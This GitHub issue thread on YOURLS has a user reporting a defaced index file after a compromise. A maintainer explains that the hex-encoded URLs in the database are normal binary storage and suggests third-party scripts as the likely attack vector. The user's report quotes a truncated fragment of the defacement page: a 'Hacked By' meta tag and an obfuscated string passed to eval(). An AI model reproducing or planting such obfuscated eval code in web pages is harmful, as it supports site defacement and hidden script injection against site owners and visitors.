### ISSUE TITLE
Hacked By Peyman Siyahi /*Deface By Siyahi & M@rAz Ali*/  

### ISSUE THREAD

**Issue by PushkaCom** [YOURLS/YOURLS#1876]
I don't know if it was a problem with my password being weak, or if my server was accessed through another site (though there was no major damage done, so I'm thinking it was some more subtle access gained) 
But the index file in the root directory of my YOURLS directory (latest version) had some hacking bragging.. 
2015/03/24 password for admin was 14 characters with alphanumeric and special characters

No new URLs were added or edited.. nothing visual appeared.. 

Here is the full code of the index.html file on Google Docs: http://pushka.com/yourls-hacked-1
(don't worry - it doesn't actually contain any links)
I read somewhere that maybe it could be an infected database?

**EG:**
```
<meta content="Hacked By Peyman Siyahi" name="subject">
var x = "_=(\"Y}RrO[c%8Cm%91%5Cp%86%89%87%
join(X=new _X))";  eval(x); 
/*Deface By Siyahi & M@rAz Ali*/
```

I'm just moving my installation to a new server user with only YOURLS installed and only static files.

**Comment by PushkaCom** [comment]
I just downloaded the database, and it is really clean and simple - though I may not know exactly what it's supposed to look like.. 

the URLs were all jumbled though..

('zen-art', 0x687474703a2f2f7a656e6861626974732e6e65742f73746172742f, 'Start Here : zen habits', '2015-02-25 20:37:02', '119.17.50.226', 27),
('hangouts-app', 0x68747470733a2f2f6368726f6d652e676f6f676c652e636f6d2f77656273746f72652f64657461696c2f68616e676f7574732f6b6e69706f6c6e6e6c6c6d6b6c6170666c6e6363656c676f6c6e70656868706c3f686c3d656e, 'Hangouts - Chrome Web Store', '2015-02-26 15:06:56', '119.17.50.226', 20),
('

is that normal?

**Comment by ozh** [comment]
> is that normal?

What, to have your site hacked? No it's not :-)

Of course it's always possible that your install was compromised because of a weak password, but most of the time the vector of the attack is third party software or share hosting limitations. We're not aware of any security hole at the moment in YOURLS (speaking for core, don't know about plugins), so check all your other scripts on your server (phpbb, wordpress, etc...).

The format of the URLs stored (`0x687474703a2f2f7a656e6....`) is normal, as they are stored as binary objects.

Check the wiki page about spam and see the security section
